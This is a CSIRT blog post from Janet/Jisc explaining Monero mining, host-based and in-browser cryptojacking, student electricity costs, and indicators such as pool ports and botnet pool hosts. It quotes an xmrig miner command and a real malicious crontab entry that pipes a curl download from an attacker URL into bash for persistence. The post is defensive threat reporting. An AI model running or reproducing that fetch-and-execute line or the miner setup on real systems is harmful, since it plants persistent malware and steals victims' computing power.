Last updated: 
1 month 3 weeks ago
Blog Manager
We are the Computer Security and Incident Response Team (CSIRT) for the Janet network. Part of Jisc's Security Operations Centre, our mission is to safeguard the current and future network security of Janet (steering the security policies for all Janet connections) and of our customers, creating a secure environment to conduct your online activities. Our primary function is monitor and resolve any security incidents that occur on the Janet network, with specialists tracking a range of platforms, including Unix, Linux and Windows.

Monero mining trends and electricity consumption, what it pays to know.

Tuesday, April 3, 2018 - 10:21

Cryptocurrencies are gaining traction and attention for their unrestricted, low-cost, authenticated transaction capabilities and reward for currency mining. Unlike Bitcoin, Monero (2014), aka XMR, uses a wallet ID that will not reveal transaction history or total value. Additionally, it doesn’t require an ASIC device to generate enough calculation hashes to profit from, allowing someone to profit from commodity desktop hardware. Alternative cryptocurrency Etherum is potentially more profitable, but this has the same wallet ID total value and transaction history issues as Bitcoin, unlike Monero which uses a private blockchain and transaction mixing to enable complete privacy. The characteristics of Monero have not only developed a trend in cryptocurrency mining, but also created a new compromise vector known as ‘cryptojacking’.

 

XMR Mining breakdown

In order to profit from mining, an individual needs to create a Monero wallet using downloaded software from official site getmonero.org. This is a software daemon that monitors transactions and receives mining payments. Mining of Monero is more profitable using mining pools rather than solo mining due to the advantages of group availability and speed for block calculations. The Stratum TCP protocol handles job allocation and hash acceptance, and is assumed the standard job sharing protocol. The comparison of hashing power versus electricity consumption profit calculation is shown below.

The mining pools have developed a port convention that denote difficulty level. Many pools use port 3333 for lower end hardware, port 6666 for medium grade, and 9999 for high end. These particular ports are a simple way of identifying Monero mining traffic. It is difficult to setup proxies for mining that hides traffic using these ports, though malicious actors sometimes do and pass traffic over port 8080 instead.

Monero hash profit calculator utilising electricity costs and hashing power (cryptocompare.com 03/2018)

 

Host-based cryptojacking infections

Malicious cyptojacking affects desktop and server environments, plus variants exist for a variety of operating systems including Windows, Linux and MacOS.

Open source miner projects xmr-stak and XMRig are openly available as binaries or source code, and are often incorporated into the infection process by running the code post-exploitation. Recently a new development has arisen in that threat actors are editing exploit code to look for existing mining binaries on a compromised machine and kill the relevant process before running their own. This ensures that any available resources of a compromised machine are dedicated to their own mining process.

A Monero miner binary on Linux is typically launched with arguments or a config file specifying pool and Wallet ID (It is also possible to hardcode the config for advanced users willing to edit source code). The first part of the config lists the pool and port, the second part the wallet ID, worker ID and any config switches:

xmrig -o pool.supportxmr.com:3333 -u 98D4GusKd7H.. -p hostname:email --threads=8

Some malicious actors do go to lengths to hide the traces of the mining binary infection by altering the binary code making file hash matching difficult, while also supplying arguments within an HTTP GET request from their payload server. For persistence, malware authors have been seen to create a cronjob that uses a CURL or HTTP GET request to pull down the latest payload. The example crontab entry below shows the payload being requested roughly every 3 hours:

25 0,3,6,9,12,15,18 * * * curl -s "hxxp://mms.kenguru.ru/includes/libraries/getsetup.php?p=sl" | bash

Within Windows operating systems a portable executable variant of XMRig or xmr-stak is dropped via Powershell exploits, utilising vectors such as crafted DDE Word documents. They will often establish persistence by linking as a startup process. Because the miner runs as a background process and not as a visible application program, it won’t be listed within the basic Task Manager overview. To identify the process, users/administrators would need to look within the extended processes view in Task Manager, or use the Sysinternals tool Process Explorer. Often the miner can be  disguised as a driver executable (in process description, though unsigned) and stored within Windows system file locations such as %systemroot%\ime\admission.exe.

 

In-Browser cryptojacking

Another development in the Monero mining field has been the creation a method of Javascript mining in the browser for the purpose of mining Monero by the owners of Coin-hive.com. This Coinhive code would be written into web pages with a wallet ID of the site owner, and the browser of any visitors of the webpage would execute the code and mine Monero for the wallet owner. with the facility for providing a mining and proof of work framework. The intention was to be used by website owners to achieve an alternative revenue stream than advertising which is often blocked by users’ ad-blockers. Upon controversy, Coinhive then switched to promoting an authorised miner that requested user permission to perform mining, however they did not retire the old ‘un-authorised’ miner. This functionality still exists under the coin-hive.com URI. So there are still active compromises occuring where a coin-hive.com un-authorised miner is injected into website with a threat actors' Wallet ID. Many AV vendor application products detect and block the coin-hive.com domain because of this abuse. An example of In-Browser cryptojacking occurred in February 2018 where the BrowseAloud browser add-on was used as a delivery vector for the Javascript mining code into Government websites including the NHS, local authorities, and Student Loans company. This website cryptojacking occured due to the use of compromised code, which formed a supply chain attack.

Whilst this was a supply chain compromise as opposed to a direct compromise of a host system, the affect on websites could have been prevented through the use of script validation methods such as CSP and SRI.

XMR mining electricity costs

Websites such as https://www.cryptocompare.com/mining/calculator/xmr show the potential profit of electricity costs versus hashing power. This cost comparison is a significant hurdle for individuals that have their electric bill included in their housing costs.

Electricity usage generated by the mining process will depend on the hardware used. For example, a decent graphics card using 500Watts requires a powerful 1000W+ PSU to handle the graphics card and/or high-end CPU (similar to that used by PC gamers). A machine that was originally intended as a Gaming PC could be re-purposed as a Miner. Miners require maximum possible hourly mining time to begin to generate the hash levels required for cyryptocurrency reward. Residences where electricity is inclusive will see rises from each mining enthusiast. Here I can present some cost estimates.

If academia based miners were setting their machines to run overnight during term time:

10p per kWh x 12hours x 200days = £240 per year X 50 students = £12000 increase in electricity

*based on machines using 1000W PSUs common for mining

*per 1p change in electricity costs for this scenario the cost increases or decreases by £1200.

*per 10 student amount for this scenario the cost increases or decreases by £2400

Note: These are estimated figures however it could be that there are increased electricity costs involved for locations where miners reside, caused directly by mining Monero or other cryptocurrencies.

From my research I have found that it takes a vast number of hashes to generate any payout, but profit is still achieved for those not paying for electricity usage. The current difficulty level is 117,558,456,398 hashes on average to generate 1 XMR. The minimum pool payout is 0.1XMR, therefore generating over 1 billion hashes will achieve payment in a mining pool. This is a low reward for someone paying for the electricity themselves.

It puts the numbers achieved by single machines into perspective; 500 hashes per second on an NVIDIA 1060 or 300 hashes per second on a high end CPU. Still, GPU mining is favoured by mining enthusiasts utilising multiple graphics cards with SLI linking. In this setup, Multi-processing software frameworks are required for cluster computing across processors and GPU/multiple GPUs. Opencl is such a framework for clustering and sending tasks to multiple processors, another is CUDA for NVIDIA parallel processing.

 

Conclusion / Summary

Based on the amount of time it takes one machine to generate monero, profit seeking threat actors will take little time to harness a group of machines to perform the mining en-mass. The method in which they do this is similar to any malware infection vector and each machine can be supplied with a unique name but the same WalletID.

Whilst CPU mining provides a lower return than GPU mining, it is easily configurable for multiple machine botnets, and benefits from the fact miners are configured to mine using the CPU by default.

Oracle Jboss, Apache SOLR, Redis, SMB (using the EternalBlue exploit), and the Network Weathermap PHP plugin are a few examples of software or services where recent vulnerabilities have been disclosed and have been exploited to install Monero miners.

It is worth noting that XMR mining isn’t illegal when done on purchased hardware and that pools such as support.xmr.com have intelligent techniques for blacklisting malicious botnet miner connections.

These are example mining pools that miners send traffic to:

xmr.nanopool.org

monero.hashvault.pro

mineXMR.com

tcp://itns.west-pool.org:4444

These are example botnet pools:
104.155.224.46 myxmr.pw (botnet)
tcp://pool.fri3nds.in:8080 (botnet)
pool-proxy.com:8080

Further reading:

http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html

https://isc.sans.edu/forums/diary/Malicious+Bash+Script+with+Multiple+Features/23411/

https://isc.sans.edu/forums/diary/Apache+SOLR+the+new+target+for+cryptominers/23425/

https://www.theguardian.com/technology/2018/feb/11/government-websites-hit-by-cryptocurrency-mining-malware

http://whattomine.com/coins/101-xmr-cryptonight

http://moneropools.com/